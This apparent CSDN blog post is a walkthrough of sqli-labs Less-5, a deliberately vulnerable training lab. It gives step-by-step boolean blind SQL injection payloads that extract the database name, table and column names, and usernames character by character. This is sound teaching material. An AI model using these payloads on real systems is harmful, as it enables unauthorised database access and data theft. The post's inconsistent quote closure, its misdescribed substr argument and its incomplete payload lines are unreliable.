sqli-labs less-5

最新推荐文章于 2024-05-06 18:59:53 发布
最新推荐文章于 2024-05-06 18:59:53 发布
阅读量314 收藏 3
点赞数 1
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52250313/article/details/115339241
版权

文章目录

sqli-labs less-5

第五关和前面的几关不同

* 判断注入

输入?id=1 回显信息为You are in……

在这里插入图片描述

判断注入类型

输入?id=1'

在这里插入图片描述

根据报错信息可知,注入类型为字符型

输入?id=1' --+ 回显正常

在这里插入图片描述

由此可知,闭合方式为’)

* 判断列数

输入?id=1') order by 3 --+ 回显正常

输入?id=1') order by 4 --+ 回显错误

故字段数为3,有3列

* 查询详细信息

由于本关的页面没有回显,故不能采用联合查询,没有报错信息,故也不能采用报错注入的方式

所以本关采用布尔盲注的方式

布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 truefalse使web页面返回true或者false,从而达到注入的目的来获取信息

布尔盲注的流程:

  • 求当前数据库的长度

使用length函数

输入?id=1') and length(database())=1 --+

判断数据库名的长度是否为1

在这里插入图片描述

页面无回显,故数据库名的长度不为1,我们从1开始依次尝试,到8时页面回显正常

在这里插入图片描述

由此可知,数据库名的长度为8

  • 求当前数据库名

    可以使用substr函数进行盲注

    输入?id=1' and (substr(database(),1,1)='s') --+

    (其中第一个参数为传入字符串,第二个参数是取几位,第三个参数为步长)

在这里插入图片描述

页面回显正常,可以判读数据库名的第一个字母为s,同样,我们尝试输入一下url

  ?id=1' and (substr(database(),2,1)='e') --+

  ?id=1' and (substr(database(),3,1)='c') --+

  ?id=1' and (substr(database(),4,1)='u') --+

  ?id=1' and (substr(database(),5,1)='r') --+

  ?id=1' and (substr(database(),6,1)='i') --+

  ?id=1' and (substr(database(),7,1)='t') --+

  ?id=1' and (substr(database(),8,1)='y') --+

数据库的名字就那几个,基本上知道了长度就能判断出名字来了

所以可以判断出数据库名为‘security’

  • 求当前数据库中表的个数

    输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=3 --+ 回显错误

在这里插入图片描述

 输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+ 回显正常

在这里插入图片描述

 输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5 --+ 回显错误

在这里插入图片描述

由此可知表的个数为4

  • 求表名

    • 可通过直接猜测的方法

      输入?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1)='emails' --+

在这里插入图片描述

?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 1,1)='referers' --+

在这里插入图片描述

?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 2,1)='uagents' --+

在这里插入图片描述

?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 3,1)='users' --+

在这里插入图片描述

在这里插入图片描述

  • 也可先求表名的长度

    输入?id=1' and (length((select table_name from information_schema.tables where table_schema = database() limit 0,1))) = 6 --+  回显正常

(或?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1)) --+  回显正常)

    再通过使用ASCII函数猜测表名

    输入?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+       ->e

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+      ->m

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=97 --+      ->a

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=105 --+      ->i

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=108 --+      ->l

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=115 --+      ->s

由此可知表名为emails

  • 查询表下列的数量

    输入?id=1' and (select count(column_name) from information_schema.columns where table_name ='users') = 3 --+ 回显正常

  • 查询表下列的长度

    输入?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) --+ 回显正常

  • 查询表下的列名

    ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),1,1)) = 105 --+      ->i

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) = 100 --+      ->d

    列一:id

    ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1)) = 117 --+      ->u

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),2,1)) = 115 --+      ->s

…………

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),7,1)) = 109 --+      ->m

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),7,1)) = 101 --+      ->e

    列二:username

    同理可猜出列三为:password

  • 求表中某字段的数量

    ?id=1' and (select count(username) from users) = 13 --+  回显正常

  • 求字段的长度

    ?id=1 and ascii(substr((select username from users  limit 0,1),4,1)) --+  回显正常

  • 求字段名

    ?id=1 and ascii(substr((select username from users  limit 0,1),1,1))  = 68 --+    ->d

?id=1 and ascii(substr((select username from users  limit 0,1),2,1))  = 117 --+   ->u

?id=1 and ascii(substr((select username from users  limit 0,1),2,1))  = 109 --+   ->m

?id=1 and ascii(substr((select username from users  limit 0,1),4,1))  = 98 --+    ->b

即完成

阿刁〇하
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less-5 (报错注入)
A9874564的博客
02-25 4203
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs Less-5(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 599
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-lab 闯关教程 Less-5
羽路星尘的博客
11-13 302
目录函数说明注入原理及过程演示试验结果 函数说明 实验所用核心函数: rand():是一个生成随机数的函数,他会返回0到1之间到一个值。 floor():是取整函数。 count():是一个聚合函数,用户返回符合条件的记录数量。 查询相关函数: concat_ws():使用语法为:CONCAT_WS(separator,str1,str2,…) CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
最新发布
2401_84253089的博客
05-06 818
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqli-labs 第五关
m0_63711447的博客
04-01 4476
第五关可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
Sqli-labs之Less-5和Less-6
m0_46315342的博客
06-04 878
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sql 注入 之sqli-labs/less-5 双注入,也称:报错注入
没有故事
03-03 974
模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs ---- Less-5 & Less-6
Nixawk
05-31 2935
在过去的日子里,我们利用https://github.com/Audi-1/sqli-labs,讨论了SQL注入的不同类型。最新发布的内容见地址。 现在,我们将回顾之前的SQL注入内容,并讨论基于错误显示的二阶查询注入,有时候又称子查询注入。有些人喜欢称其为盲注,但是我喜欢称其为显错注入,因为接下来我们会通过错误来获取信息。接下来的内容会如第一部分那样,继续采用分类方案,接下来的内容会以
sqli-labs-master第五关Less-5超详细360°无死角教程
hih30250的博客
11-22 201
自我认为这一关还是挺有意思的,我们先来尝试一下注入语句。我们先访问空白页面看看返回了什么:,告诉我们要输入ID好,那我们输入上id,看看页面会返回什么,如图:可以看到,只要数据库对应的id存在,那么就会给出一串固定的“You are in …”,如果对应的id不存在那么就什么都没有。这个时候怎么办?>_
sqli-labs ————less -17
Fly_鹏程万里
05-12 854
Less-17源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
小白入门SQL注入基础-基于Sqli-lab平台实战
DYBOY-程序开发&网络安全
06-08 4159
简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。 0x00 SQL注入漏洞简介 有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引...
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 636
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
sqli-labs(less5)
m0_68980215的博客
07-08 304
sql-lab lesson5
sqli-labs-less
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值